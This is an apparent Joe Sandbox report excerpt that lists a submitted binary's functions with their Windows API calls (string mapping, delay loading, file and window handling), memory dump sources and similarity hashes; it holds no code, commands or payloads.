    • Instruction ID: 0013fab37b71955bfa2e199de3b1bf585eb04cf138433cf7a33fd3f2f7c56113
    • Opcode Fuzzy Hash: 2d273ff484dfb011e25cb551966dcb8b37c083cbcc880bee102db87466103a9b
    • Instruction Fuzzy Hash: 5741F67050428C9EEB228E64CC85EFABBEBEF55708F1404EDE5CA87142D335AE459F61
    Function 0006C11C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 0006C18D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: String
    • String ID: LCMapStringEx
    • API String ID: 2568140703-3893581201
    • Opcode ID: 8fd25538cc8f0d5c676c6a2cf8947ef76cad13c062877df8d389f472a44454c8
    • Instruction ID: acd62173cb10d84cae76bdbd4d584f9193bb068f3141edc0ff89489f4411cb6e
    • Opcode Fuzzy Hash: 8fd25538cc8f0d5c676c6a2cf8947ef76cad13c062877df8d389f472a44454c8
    • Instruction Fuzzy Hash: 7D014C32940108BBEF129F90DC05DEE3FA2EF09720F418115FF082A161CB368971EB95
    Function 0006C0BA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0006B71F), ref: 0006C105
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: InitializeCriticalSectionEx
    • API String ID: 2593887523-3084827643
    • Opcode ID: 70937e5fe6dcd3765d8838f4ce250952ed7bfe36e6d060333636c00d9daa9f37
    • Instruction ID: f2365e3c0c79b478e0ddae3342335bc30371c7d8115e669073787374f9c5d6f6
    • Opcode Fuzzy Hash: 70937e5fe6dcd3765d8838f4ce250952ed7bfe36e6d060333636c00d9daa9f37
    • Instruction Fuzzy Hash: 7DF0E931E81118BBEF219F50DC05CAE7FA2EF18750F408125FE096A161CF365D51DB85
    Function 0006BF5F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Alloc
    • String ID: FlsAlloc
    • API String ID: 2773662609-671089009
    • Opcode ID: 186d4af94a205b58a3aa705838249d929bbdd8941947c8e40c4963e6dd613a68
    • Instruction ID: bb483c77b6700d313302531409bc7ac6ee68f2b10e3582b6497a333c6600c26f
    • Opcode Fuzzy Hash: 186d4af94a205b58a3aa705838249d929bbdd8941947c8e40c4963e6dd613a68
    • Instruction Fuzzy Hash: 0BE05530F80218ABD7116B609C069BEBB92DF04B20F414126FA0CAA250CF391D818BDE
    Function 0005F705 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 0565cac8c5ad6f077c80e69b309cbcf53d01269a724caff43406d7af7322c6e2
    • Instruction ID: 41471187254c8e049478870d5b6e77e78205cf5fdeeae7d48ac60f1e34190df6
    • Opcode Fuzzy Hash: 0565cac8c5ad6f077c80e69b309cbcf53d01269a724caff43406d7af7322c6e2
    • Instruction Fuzzy Hash: FFB01281268503BC32446254BC12E3F021CC7D1B13330C83BFC06C4442D84C0C491032
    Function 0005F70F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: bfd9a6a29423a712cb26397419bf8b9bf51e09d98fe358da0f447564e293fa45
    • Instruction ID: 293cf3fdeca7a34bfde793f74569076d9cc5cef35a5795179cb40dfe258b3498
    • Opcode Fuzzy Hash: bfd9a6a29423a712cb26397419bf8b9bf51e09d98fe358da0f447564e293fa45
    • Instruction Fuzzy Hash: 5DB01281368503BC32446254BD12E3B011CD7D0B13330883BF806C8441D88C0D491072
    Function 0005F719 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 23f30b74af2df463513391be679cb4b2adc42c9bdca60b6f859b58327a4ea8c2
    • Instruction ID: 89d84049307a8449f6294e0ed80d0f28d22e34b5915104f48f7e2b804e4098cd
    • Opcode Fuzzy Hash: 23f30b74af2df463513391be679cb4b2adc42c9bdca60b6f859b58327a4ea8c2
    • Instruction Fuzzy Hash: 6CB01281268503BC32446294BC12E3B011CD7D0B13330883BF806C4841D84C0C481032
    Function 0005F723 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 02fefe8571c8224e52ed51badb323015f8cf1face8a88595e852ddd082d8c6b7
    • Instruction ID: a1b2479682e2859081fed88a23bb0f78344c5b48132a14b9d11e99ca47ad223f
    • Opcode Fuzzy Hash: 02fefe8571c8224e52ed51badb323015f8cf1face8a88595e852ddd082d8c6b7
    • Instruction Fuzzy Hash: AAB012812686037C32946254BC02E3B011CC7D0B133308D3BF806C4441D84C0C881032
    Function 0005F72D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 65e74d11a948f2988848c601399dacfdfe018c3e095082d1656c7deafcaf7a68
    • Instruction ID: d340a24c2ee88dd37876ae62d18045cef2473f56e64d2c98f64d62347aa7211e
    • Opcode Fuzzy Hash: 65e74d11a948f2988848c601399dacfdfe018c3e095082d1656c7deafcaf7a68
    • Instruction Fuzzy Hash: A2B012822685037C32546254BC02E3F011CC7D1B13330C83BFC06C9446D84C0C4D1032
    Function 0005FD48 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005FD5A
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: 3Ro
    • API String ID: 1269201914-1492261280
    • Opcode ID: bf00e87ed4bb2b8f1b09d815e4c99b8e6be42ae52bfb057c74950b1db4a638b3
    • Instruction ID: 80d910ef7e9c5f42f961f47c5856f322b79eca5336c63724f1b53dfee5dc1ff0
    • Opcode Fuzzy Hash: bf00e87ed4bb2b8f1b09d815e4c99b8e6be42ae52bfb057c74950b1db4a638b3
    • Instruction Fuzzy Hash: DAB012A12689037C330421506C02E3B023DDBC0B13330C63FFB03C4041944C0C4C1071
    Function 0005F6EF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F6FC
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID: Pzv
    • API String ID: 1269201914-4092170144
    • Opcode ID: 2ca2643cba812a04773a07a93b2204dc3970e6059c50cc46f61db94a62575d1b
    • Instruction ID: aa125f114f5c812f507e831b9ffc53d2ed97ad5ab489e145a4033c13e9dd3df7
    • Opcode Fuzzy Hash: 2ca2643cba812a04773a07a93b2204dc3970e6059c50cc46f61db94a62575d1b
    • Instruction Fuzzy Hash: 37A011822A82033C32082220BC02C3B022CCAE0B22330882BF802C8882AC880888203A
    Function 0006CDA0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0006C96B: GetOEMCP.KERNEL32(00000000,?,?,0006CBF4,?), ref: 0006C996
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0006CC39,?,00000000), ref: 0006CE14
    • GetCPInfo.KERNEL32(00000000,0006CC39,?,?,?,0006CC39,?,00000000), ref: 0006CE27
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID:
    • API String ID: 546120528-0
    • Opcode ID: 141ca90bbc24dc8b0b4fb43af37d70a0c8cdd8688925d709dc786474640b1a04
    • Instruction ID: 852db4c40c5388ee7ba91b2c20583f56eb0ecc11dd77073cad0d4cac5a91256d
    • Opcode Fuzzy Hash: 141ca90bbc24dc8b0b4fb43af37d70a0c8cdd8688925d709dc786474640b1a04
    • Instruction Fuzzy Hash: 38510171E002459EFB209F75C885EBBBBF7AF41300F14456EE0D68B252D63A9A46CB90
    Function 0004ACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
    Download Yara Rule
    APIs
    • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,0004ACB0,?,?,00000000,?,?,00049C8B,?), ref: 0004AE3A
    • GetLastError.KERNEL32(?,?,00049C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0004AE49
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 5b90d5fe07633a583a5af12c51813a7ee93cfd79b0203e02a4a255892187b855
    • Instruction ID: ed4514fcdac03ba1c16885e1b674ca888640eccb3b36286f14333ee4126feaae
    • Opcode Fuzzy Hash: 5b90d5fe07633a583a5af12c51813a7ee93cfd79b0203e02a4a255892187b855
    • Instruction Fuzzy Hash: 3A4124F5F843459BDB34AE24C884AAE73E4FB4A312F100539E85783A51DB74DC858B5B
    Function 0005A59B Relevance: 3.1, APIs: 2, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • ShowWindow.USER32(00000000,00000005,?,?,?,?,0005A7F6,00000000,?), ref: 0005A699
    • SetWindowTextW.USER32(00000000,00000000), ref: 0005A6A3
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$ShowText
    • String ID:
    • API String ID: 1551406749-0
    • Opcode ID: c41f354ec79057fdcf8c9888ecae3000debab37314922567db0025acfc55d9ad
    • Instruction ID: c51508dc8fff80611abb0c739a2f6d1223c0e05f0725ab790e0623f441cc1f70
    • Opcode Fuzzy Hash: c41f354ec79057fdcf8c9888ecae3000debab37314922567db0025acfc55d9ad
    • Instruction Fuzzy Hash: ED31AC31700716AFDB00DF64DC84A2BBBE8BF49701B09021EFA0597261DF65AC56CFA2
    Function 0006CBD7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0006A505: GetLastError.KERNEL32(?,00083070,00065972,00083070,?,?,00065271,00000050,?,00083070,00000200), ref: 0006A509
      • Part of subcall function 0006A505: _free.LIBCMT ref: 0006A53C
      • Part of subcall function 0006A505: SetLastError.KERNEL32(00000000,?,00083070,00000200), ref: 0006A57D
      • Part of subcall function 0006A505: _abort.LIBCMT ref: 0006A583
      • Part of subcall function 0006CCFE: _abort.LIBCMT ref: 0006CD30
      • Part of subcall function 0006CCFE: _free.LIBCMT ref: 0006CD64
      • Part of subcall function 0006C96B: GetOEMCP.KERNEL32(00000000,?,?,0006CBF4,?), ref: 0006C996
    • _free.LIBCMT ref: 0006CC4F
    • _free.LIBCMT ref: 0006CC85
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorLast_abort
    • String ID:
    • API String ID: 2991157371-0
    • Opcode ID: 06631647ce1b14c9c04ed7a333b0e6acdc53f72498e43b581f36377359ca288e
    • Instruction ID: e821c778b24be679c85544e77fd74cdd4928641ca0b2a500e99a962e6655a514
    • Opcode Fuzzy Hash: 06631647ce1b14c9c04ed7a333b0e6acdc53f72498e43b581f36377359ca288e
    • Instruction Fuzzy Hash: AD31A431904108AFEB54EFA9D845FBDB7F6EF41330F254099E4589B292EB369D40DB50
    Function 0004B032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
    Download Yara Rule
    APIs
    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047ED0,?,?,?,00000000), ref: 0004B04C
    • SetFileTime.KERNEL32(?,?,?,?), ref: 0004B100
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$BuffersFlushTime
    • String ID:
    • API String ID: 1392018926-0
    • Opcode ID: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
    • Instruction ID: 2a31fa5323d7eca3df331855a4cc5a5e64fcb2629ab9f22b8bb2ffb2022192d0
    • Opcode Fuzzy Hash: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
    • Instruction Fuzzy Hash: 8B212371248341EFC724DF74C891AABBBE4AF96306F04492CF4E183141D729E90CDB66
    Function 0004A8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0004B1B7,?,?,000481FD), ref: 0004A946
